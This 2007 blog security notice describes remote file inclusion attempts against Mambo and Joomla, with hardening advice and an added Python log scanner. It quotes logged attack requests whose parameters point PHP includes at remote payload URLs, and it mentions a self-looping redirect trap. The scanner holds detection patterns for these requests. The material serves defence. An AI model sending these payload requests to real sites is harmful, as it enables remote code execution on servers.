Security Notice: Mambo and Joomla Hack Attempts More Rampant

Wednesday, 06 June 2007
Updated 6/10/2007
MAJOR UPDATE! The file referenced here is a list of Google search strings that attackers use to find "vulnerable" sites. Conveniently, it also contains exactly the request strings you should block in your .htaccess file.
Judging by my server logs, a large number of attackers (mostly Turkish) have been trying to break into Joomla- and Mambo-based sites. The attack is usually nothing more than a single crafted request: the URL carries a value such as mosConfig_absolute_path=http://..., and on a site that is not up to date and hardened, PHP's register_globals (or the CMS's emulation of it) turns that query parameter into the variable a vulnerable component hands to include(), so the server fetches and executes the attacker's remote script. Some of the URLs I see include the following:
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt
//administrator/components/com_mamboboard/file_upload.php=http://www.evilcode.com
/projects/libraries/pcl/pcltar.php
/site-announcements//administrator/components/com_uhp/uhp_config.php
/administrator/components/com_babackup/classes/Tar.php
//administrator/components/com_mamboboard/file_upload.php=http://theirevilurl.com
//administrator/components/com_remository/admin.remository.php http://www.evilcode.com/
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php
/administrator/components/com_comprofiler/plugin.class.php
/administrator/components/com_cropimage/admin.cropcanvas.php
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
/administrator/components/com_mgm/help.mgm.php
/administrator/components/com_remository/admin.remository.php
/administrator/components/com_serverstat/install.serverstat.php
/administrator/components/com_uhp/uhp_config.php
/administrator/components/com_webring/admin.webring.docs.php
/components/com_artlinks/artlinks.dispnew.php
/components/com_cpg/cpg.php
/components/com_galleria/galleria.html.php
/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php
/components/com_performs/performs.php
/components/com_phpshop/toolbar.phpshop.html.php
/components/com_rsgallery/rsgallery.html.php
/components/com_smf/smf.php
/components/com_zoom/includes/database.php
//function.is-dir
/function.is-dir
//administrator/components/com_remository/admin.remository.php
/function.require
/function.require-once
/components/com_zoom/classes/iptc/EXIF_Makernote.php
//components/com_joomlaboard/file_upload.php
/administrator/:/www.mattparnell.com/index.php
/projects//components/com_joomlaboard/file_upload.php
/projects/top-10-must-have-joomla-addons.html//components/com_joomlaboard/file_upload.php
///administrator/components/com_mgm/help.mgm.php
//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php
//administrator/components/com_uhp/uhp_config.php
//classes/adodbt/sql.php
//components/com_cpg/cpg.php
//components/com_mtree/Savant2/Savant2_Plugin_textarea.php
//components/com_phpshop/toolbar.phpshop.html.php
//components/com_rsgallery/rsgallery.html.php
/dministrator/components/com_remository/admin.remository.php
/shady-stuff/interesting-open-directories.html
New as of June 9:
/'<a
/allinurl:%22.php
//administrator/components/com_serverstat/install.serverstat.php
//components/com_remository/admin.remository.php
//components/com_zoom/classes/iptc/EXI_Makernote.php
//performs.php
/administrator/index2.pp
/components/com_videodb/core/videodb.class.xml.php
/components/com_zoom/classes/iptc/EXIF.php
/com_mtreehttp://efardella.cinet.it/claroline/phpbb/id.txt
/com_uhphttp://jargo.phpnet.us/ilkom.txt
/site-announcements//components/com_remository/admin.remository.php
/site-announcements/components/com_rsgallery/rsgallery.html.php
Note that the one in bold is the one I see attempted most often. I suggest you upgrade to the latest stable version of Mambo or Joomla and add .htaccess rules that send requests for these addresses to a noindex.html page (don't click; mine loops in infinite redirects to itself, and at some point I want it to pop up a copy of itself onload too, to make life even harder for the would-be hacker). Two PHP settings matter more than any redirect, because they remove the mechanism these requests depend on: register_globals = Off, so a query parameter can no longer become mosConfig_absolute_path, and allow_url_fopen = Off (or allow_url_include = Off on PHP 5.2 and later), so include() cannot pull code from a remote URL at all.
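As an added example (not part of the original notice, and not code from the Mambo or Joomla projects), here is a small Python script that flags the request patterns listed above in an Apache combined-format access log. It looks for three things: a query parameter that overrides a PHP or CMS global such as mosConfig_absolute_path, GLOBALS or _REQUEST[...]; a parameter value (or a path) that carries a remote URL, which is what makes the include a remote file inclusion; and a request for one of the component scripts in the lists. The log lines are constructed for the example, with made-up client IPs, hostnames and user agents; the list of probed scripts is copied from the lists above.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, unquote

# Constructed Apache combined-format log lines modelled on the request patterns
# listed in this notice. Client IPs, timestamps and user agents are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jun/2007:03:14:22 +0000] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.theirsite.com/code.txt HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
203.0.113.7 - - [09/Jun/2007:03:14:23 +0000] "GET //administrator/components/com_mamboboard/file_upload.php=http://www.evilcode.com HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.4 - - [09/Jun/2007:03:15:01 +0000] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php HTTP/1.0" 404 210 "-" "Mozilla/4.0"
192.0.2.9 - - [09/Jun/2007:03:16:40 +0000] "GET /index.php?option=com_content&task=view&id=12&Itemid=1 HTTP/1.1" 200 8842 "http://www.example.com/" "Mozilla/5.0"
"""

# Combined log format: client identd user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names the attempts in this notice use. With register_globals on (or
# Mambo's emulation of it) such a request variable becomes the PHP global that
# the vulnerable component later hands to include()/require().
GLOBAL_PREFIXES = ("mosconfig_", "globals", "_request[")

# A value starting with a URL scheme turns that include into a remote file
# inclusion: PHP fetches and executes the attacker's file.
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.I)

# Component scripts and directories from the lists above, matched anywhere in
# the path so that doubled slashes or a site prefix such as /projects/ do not
# hide them.
PROBED_SCRIPTS = [
    "administrator/components/com_mamboboard/file_upload.php",
    "components/com_joomlaboard/file_upload.php",
    "administrator/components/com_uhp/uhp_config.php",
    "administrator/components/com_remository/admin.remository.php",
    "administrator/components/com_babackup/classes/Tar.php",
    "administrator/components/com_a6mambocredits/admin.a6mambocredits.php",
    "administrator/components/com_comprofiler/plugin.class.php",
    "administrator/components/com_cropimage/admin.cropcanvas.php",
    "administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php",
    "administrator/components/com_mgm/help.mgm.php",
    "administrator/components/com_serverstat/install.serverstat.php",
    "administrator/components/com_webring/admin.webring.docs.php",
    "components/com_artlinks/artlinks.dispnew.php",
    "components/com_cpg/cpg.php",
    "components/com_galleria/galleria.html.php",
    "components/com_mtree/Savant2/",
    "components/com_performs/performs.php",
    "components/com_phpshop/toolbar.phpshop.html.php",
    "components/com_rsgallery/rsgallery.html.php",
    "components/com_smf/smf.php",
    "components/com_videodb/core/videodb.class.xml.php",
    "components/com_zoom/",
    "classes/adodbt/sql.php",
    "libraries/pcl/pcltar.php",
]
PROBED_RE = re.compile("|".join(re.escape(p) for p in PROBED_SCRIPTS), re.I)


def classify(target: str) -> list[str]:
    """Return the reasons a request target looks like a Mambo/Joomla RFI attempt
    or component probe; an empty list means nothing suspicious was found."""
    # Do not use urllib.parse.urlsplit here: a target such as //administrator/...
    # parses as a scheme-relative URL with host "administrator" and loses the path.
    path, _, query = target.partition("?")
    path = unquote(path)
    reasons = []
    # parse_qsl percent-decodes names and values, so http%3A%2F%2F is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower().startswith(GLOBAL_PREFIXES):
            reasons.append(f"global override via {name}")
        if REMOTE_URL_RE.match(value):
            reasons.append(f"remote URL in {name}")
    # Some scanners glue the URL straight onto the script path (see the lists above).
    if re.search(r"=\s*(?:https?|ftp)://", path, re.I):
        reasons.append("remote URL embedded in path")
    if PROBED_RE.search(path):
        reasons.append("known component script probed")
    return list(dict.fromkeys(reasons))  # deduplicate, keep order


def scan_log(text: str) -> list[dict]:
    """Run classify() over every request line and return the suspicious ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "target": m["target"],
                # A 200 on an RFI request does not prove compromise, but it means
                # the targeted script exists; check those first.
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['target']}")
        for reason in hit["reasons"]:
            print(f"    - {reason}")
```

Run it against a real access log with scan_log(open("access_log").read()) and sort the hits by status: a 404 is a probe that found nothing, a 200 against a script with a remote URL in the query is the one to investigate. The same three conditions translate directly into mod_rewrite for the .htaccess approach mentioned above: a RewriteCond on %{QUERY_STRING} for mosConfig_absolute_path= and for =https?://, one on %{REQUEST_URI} for the component paths, and a final RewriteRule .* - [F], which answers 403 outright and avoids the redirect loop.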